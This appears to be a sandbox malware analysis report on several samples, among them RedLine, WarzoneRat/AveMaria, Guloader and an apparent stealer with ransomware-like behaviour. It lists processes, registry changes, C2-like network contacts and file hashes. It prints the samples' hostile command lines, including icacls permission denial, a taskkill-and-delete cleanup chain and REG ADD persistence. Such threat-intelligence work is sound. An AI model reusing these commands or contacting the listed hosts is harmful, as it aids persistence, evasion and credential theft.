| N/A | N/A | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\b46544cb-1721-4c10-9f1b-6501dc4a3d75\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
Loads dropped DLL
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Accesses 2FA software files, possible credential harvesting
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\b46544cb-1721-4c10-9f1b-6501dc4a3d75\\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1884 set thread context of 1264 | N/A | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe |
| PID 1600 set thread context of 1124 | N/A | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe |
| PID 1300 set thread context of 1740 | N/A | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = … | C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe"
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\b46544cb-1721-4c10-9f1b-6501dc4a3d75" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
"C:\Users\Admin\AppData\Local\Temp\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe
"C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe"
C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe
"C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe" & del C:\ProgramData\*.dll & exit
C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Windows\system32\taskeng.exe
taskeng.exe {EF2636DA-2E7B-4604-BE1B-3AF3965780C7} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\b46544cb-1721-4c10-9f1b-6501dc4a3d75\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
C:\Users\Admin\AppData\Local\b46544cb-1721-4c10-9f1b-6501dc4a3d75\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe --Task
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.2ip.ua | udp |
| N/A | 77.123.139.190:443 | api.2ip.ua | tcp |
| N/A | 77.123.139.190:443 | api.2ip.ua | tcp |
| N/A | 8.8.8.8:53 | securebiz.org | udp |
| N/A | 8.8.8.8:53 | astdg.top | udp |
| N/A | 14.51.96.70:80 | securebiz.org | tcp |
| N/A | 222.236.49.124:80 | astdg.top | tcp |
| N/A | 222.236.49.124:80 | astdg.top | tcp |
| N/A | 8.8.8.8:53 | shpak125.tumblr.com | udp |
| N/A | 74.114.154.18:443 | shpak125.tumblr.com | tcp |
| N/A | 116.202.183.50:80 | 116.202.183.50 | tcp |
| N/A | 222.236.49.124:80 | astdg.top | tcp |
| N/A | 222.236.49.124:80 | astdg.top | tcp |
Files
memory/1884-60-0x0000000000920000-0x0000000000A3B000-memory.dmp
memory/1264-61-0x0000000000400000-0x0000000000537000-memory.dmp
memory/1264-62-0x0000000000424141-mapping.dmp
memory/1264-63-0x0000000075891000-0x0000000075893000-memory.dmp
memory/1264-64-0x0000000000400000-0x0000000000537000-memory.dmp
memory/540-65-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\b46544cb-1721-4c10-9f1b-6501dc4a3d75\83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3.exe
| MD5 | b2a93feb45e2d76bdfc83c623a14d5bf |
| SHA1 | f39c5e92adb9ba4602d8973cc286ab265f11d137 |
| SHA256 | 83c46c1972e541b0d3baebec8cbdfe6e6ae7d87643c701eed91ffc844b9168c3 |
| SHA512 | db93fcade10ff3b4291d6337acdb9a675e178154d98c1feb5f5c63e814edd08a37cfcab0140a6e0b84e5013127a93c8c4c4249c5d669a148fb0caf65575c66a5 |
memory/1600-67-0x0000000000000000-mapping.dmp
memory/1124-69-0x0000000000424141-mapping.dmp
memory/1124-71-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | fd4ee296c73fb1ef0a18882b09ea6bd6 |
| SHA1 | 219be5079f0078fa1947cd44af24e9228acbd510 |
| SHA256 | e737e72814e28ecc563e852d9d8a6106cc2a6e6316a937ac79d399a5fdc88a96 |
| SHA512 | b3b8b77ce1ced729d4b4a4f4625fda2a2db7c8b663bad2fa2df61bea69d40a47240d4a69a73c87bdb12aa7fbb2443461343d01d783d122b173fee0917a2ba1a2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | 5ff584af05cab237078a6630a50548fe |
| SHA1 | de58d2ed9b44cd4fd89c45ea7136d0faf86a7d63 |
| SHA256 | a9d0645039bc6644e1f83f69c4d78cc3a9a3a55615921a0c44a8c5abd3404eac |
| SHA512 | 07c3dc4a07fd68ae982cffec18a8aa7ffc708b832aada915c653398aba8f61c212c64e971afa47eebb547d124e33a1d5e093c9235dfcee9386b4c43a93dcc4b6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | 55f8c8443bcbe807523f70450da13b67 |
| SHA1 | 274e3966fd2580d969e603f820e7a34b195d9057 |
| SHA256 | 450123c7fd6801816379ef956f24ea76cc59fa5b3f6f22e656fa986eac6a513f |
| SHA512 | f339c932f19553574c6e48c9d51a61df095f82c99a4a6eba169154152db42c2b2f7143f924f05b2a19bc6cb9e24101cf4400cfdd497ca85a94c0db65de37c670 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | 38b33d357b48f05e2e68d4f8a1db047a |
| SHA1 | 8ce535f29afb1fa588d7152fcc59f35cefc987ba |
| SHA256 | 74e458267a323f8bd03a94b9e476f734f925907f1d331d5faaec13dfaddd561e |
| SHA512 | e92bb39c16f71a3a42457e917cbf80cf1ec04e34b14c63b5650d3d485556cbb371c81053e263ac5aaa531c7705ab375c92d85f98a9a8cff173c01905bed1ce3f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 2902de11e30dcc620b184e3bb0f0c1cb |
| SHA1 | 5d11d14a2558801a2688dc2d6dfad39ac294f222 |
| SHA256 | e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544 |
| SHA512 | efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 9cdcfc1279958c9c3c36d77ceecb0937 |
| SHA1 | 9505016cd4dd6fb0caaca1ae7412d6037f8ae571 |
| SHA256 | c2726a39036b2c10e0f8acb9f04bfe8107c29c4d83c65c2724e84d8dd47b5af0 |
| SHA512 | 9d845a056f279eae9df86e4a795f0f4ea3bc5f0c47a7a736356ce152448a08f13cc0634506df5f392f671fce63742d3d147efe8293af97c7ece4edccf2ecdeb1 |
\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
memory/1300-80-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\0dc040fd-d0ca-44dd-bdf9-02f2844c67ef\build2.exe
| MD5 | bb494dd99be260d8eeb1980ce2a96d4c |
| SHA1 | ac28b998e53f55c106f624025480ab9a51a00539 |
| SHA256 | 910c0e730a147927a0b840ac1d5501c0046d6c568da8adced6ce9d95171bf886 |
| SHA512 | b135732538c19d17aca4ec51fea19d1200ae387e2fccdb91876e9890ac28de58bde4bba8d5801532a76015eda3d08bcc9f65398c4c5e63537e96d916ce7c7030 |
memory/1740-83-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/1740-84-0x000000000046B76D-mapping.dmp
memory/1300-87-0x0000000001C50000-0x0000000001CEE000-memory.dmp
memory/1740-88-0x0000000000400000-0x00000000004A1000-memory.dmp
\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
\ProgramData\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
\ProgramData\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
memory/1556-93-0x0000000000000000-mapping.dmp
memory/452-94-0x0000000000000000-mapping.dmp
memory/1400-95-0x0000000000000000-mapping.dmp
C:\ProgramData\softokn3.dll
| MD5 | a2ee53de9167bf0d6c019303b7ca84e5 |
| SHA1 | 2a3c737fa1157e8483815e98b666408a18c0db42 |
| SHA256 | 43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083 |
| SHA512 | 45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8 |
C:\ProgramData\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
C:\ProgramData\nss3.dll
| MD5 | bfac4e3c5908856ba17d41edcd455a51 |
| SHA1 | 8eec7e888767aa9e4cca8ff246eb2aacb9170428 |
| SHA256 | e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78 |
| SHA512 | 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66 |
C:\ProgramData\msvcp140.dll
| MD5 | 109f0f02fd37c84bfc7508d4227d7ed5 |
| SHA1 | ef7420141bb15ac334d3964082361a460bfdb975 |
| SHA256 | 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4 |
| SHA512 | 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39 |
C:\ProgramData\mozglue.dll
| MD5 | 8f73c08a9660691143661bf7332c3c27 |
| SHA1 | 37fa65dd737c50fda710fdbde89e51374d0c204a |
| SHA256 | 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd |
| SHA512 | 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89 |
C:\ProgramData\freebl3.dll
| MD5 | ef2834ac4ee7d6724f255beaf527e635 |
| SHA1 | 5be8c1e73a21b49f353c2ecfa4108e43a883cb7b |
| SHA256 | a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba |
| SHA512 | c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2 |
memory/1072-102-0x0000000000000000-mapping.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
149s
Max time network
158s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3256 set thread context of 3408 | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
"C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe"
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 46.8.19.196:53773 | N/A | tcp |
Files
memory/3256-114-0x00000000003C0000-0x00000000003C1000-memory.dmp
memory/3256-116-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
memory/3256-117-0x0000000002710000-0x0000000002718000-memory.dmp
memory/3256-118-0x0000000004D00000-0x0000000004D01000-memory.dmp
memory/3256-119-0x0000000004C30000-0x0000000004C31000-memory.dmp
memory/3408-120-0x0000000000400000-0x000000000041E000-memory.dmp
memory/3408-121-0x0000000000417E2A-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe.log
| MD5 | 7438b57da35c10c478469635b79e33e1 |
| SHA1 | 5ffcbdfbfd800f67d6d9d6ee46de2eb13fcbb9a5 |
| SHA256 | b253c066d4a6604aaa5204b09c1edde92c410b0af351f3760891f5e56c867f70 |
| SHA512 | 5887796f8ceb1c5ae790caff0020084df49ea8d613b78656a47dc9a569c5c86a9b16ec2ebe0d6f34c5e3001026385bb1282434cc3ffc7bda99427c154c04b45a |
memory/3408-125-0x0000000005260000-0x0000000005261000-memory.dmp
memory/3408-126-0x0000000004C90000-0x0000000004C91000-memory.dmp
memory/3408-127-0x0000000004CF0000-0x0000000004CF1000-memory.dmp
memory/3408-128-0x0000000004D30000-0x0000000004D31000-memory.dmp
memory/3408-129-0x0000000005000000-0x0000000005001000-memory.dmp
memory/3408-130-0x0000000004C50000-0x0000000005256000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
54s
Max time network
141s
Command Line
Signatures
WarzoneRat, AveMaria
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2760 set thread context of 2356 | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe |
| PID 3084 set thread context of 1364 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
"C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe"
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | dfdgdsasedw.ydns.eu | udp |
| N/A | 203.159.80.165:34566 | dfdgdsasedw.ydns.eu | tcp |
Files
memory/2760-114-0x0000000000310000-0x0000000000311000-memory.dmp
memory/2760-116-0x0000000005230000-0x0000000005231000-memory.dmp
memory/2760-117-0x0000000004C50000-0x0000000004C51000-memory.dmp
memory/2760-118-0x0000000004C00000-0x0000000004C01000-memory.dmp
memory/2760-119-0x0000000004D30000-0x000000000522E000-memory.dmp
memory/2760-120-0x0000000006C30000-0x0000000006C7E000-memory.dmp
memory/2760-121-0x0000000006D00000-0x0000000006D01000-memory.dmp
memory/2760-126-0x0000000008710000-0x0000000008777000-memory.dmp
memory/2760-127-0x00000000087A0000-0x00000000087A1000-memory.dmp
memory/2356-128-0x0000000000400000-0x000000000055E000-memory.dmp
memory/2356-129-0x0000000000405E28-mapping.dmp
memory/2760-130-0x0000000004D30000-0x000000000522E000-memory.dmp
memory/2356-131-0x0000000000400000-0x000000000055E000-memory.dmp
memory/3412-132-0x0000000000000000-mapping.dmp
memory/3084-133-0x0000000000000000-mapping.dmp
C:\ProgramData\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/3532-140-0x0000000000000000-mapping.dmp
memory/3084-142-0x0000000004DF0000-0x00000000052EE000-memory.dmp
memory/1364-152-0x0000000000405E28-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/3084-155-0x0000000004DF0000-0x00000000052EE000-memory.dmp
memory/1364-156-0x0000000000400000-0x000000000055E000-memory.dmp
memory/3924-157-0x0000000000000000-mapping.dmp
memory/3924-158-0x0000000002680000-0x0000000002681000-memory.dmp
memory/1364-159-0x0000000004450000-0x000000000458C000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:35
Platform
win7v20210410
Max time kernel
10s
Max time network
25s
Command Line
Signatures
Guloader,Cloudeye
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a3feb5265e6d02710f04ff618e966e9da9ba8fc8dc5692d6f7633fe0a3037b66.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\a3feb5265e6d02710f04ff618e966e9da9ba8fc8dc5692d6f7633fe0a3037b66.exe
"C:\Users\Admin\AppData\Local\Temp\a3feb5265e6d02710f04ff618e966e9da9ba8fc8dc5692d6f7633fe0a3037b66.exe"
Network
Files
memory/2016-61-0x0000000000270000-0x0000000000283000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:31
Platform
ubuntu-amd64
Max time kernel
21858s
Max time network
60s
Command Line
Signatures
Processes
./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
[./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901]
Network
| Country | Destination | Domain | Proto |
| N/A | 1.1.1.1:53 | ntp.ubuntu.com | udp |
| N/A | 1.1.1.1:53 | ntp.ubuntu.com | udp |
